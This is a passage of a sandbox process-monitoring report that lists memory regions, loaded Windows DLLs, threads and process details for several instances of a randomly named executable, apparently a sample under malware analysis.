0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5544 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5545 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5710 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5711 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5712 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5713 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 5714 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5715 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5716 start_va = 0x760000 end_va = 0x81dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5717 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5718 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5719 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5720 start_va = 0x820000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 5721 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5722 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5723 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5724 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5725 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5829 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5830 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5831 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5832 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5833 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5834 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5835 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5836 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5837 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5838 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5839 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5840 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5841 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5882 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5883 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5884 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 5885 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 174 os_tid = 0xef8 Thread: id = 195 os_tid = 0x11d4 Thread: id = 208 os_tid = 0xe74 Process: id = "56" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xc9a9000" os_pid = "0x119c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5078 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5079 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5080 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5081 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5082 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5083 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5084 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5085 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5086 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5087 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5088 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5089 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5090 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5091 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5092 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5093 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5569 start_va = 0x440000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5570 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5571 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5572 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5573 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5574 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5575 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5576 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5761 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5762 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5763 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5764 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5765 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5766 start_va = 0x710000 end_va = 0x7cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5767 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5768 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5769 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5770 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5771 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5772 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5773 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5774 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5775 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5776 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5849 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5850 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5851 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5852 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5853 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5854 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5855 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5856 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5857 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5858 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5859 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5860 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5874 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5876 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5877 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5878 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 176 os_tid = 0x4d8 Thread: id = 194 os_tid = 0x11d8 Thread: id = 210 os_tid = 0x9a4 Process: id = "57" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xc8ae000" os_pid = "0x1178" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5102 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5103 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5104 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5105 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5106 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5107 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5108 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5109 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5110 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5111 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5112 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5113 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5114 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5115 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5116 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5117 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5577 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5578 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5579 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5580 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5581 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5582 start_va = 0x540000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5777 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5778 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5779 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5780 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5781 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5782 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5783 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5784 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5785 start_va = 0x640000 end_va = 0x6fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5786 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5787 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5788 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5789 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 5790 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5791 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5792 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: 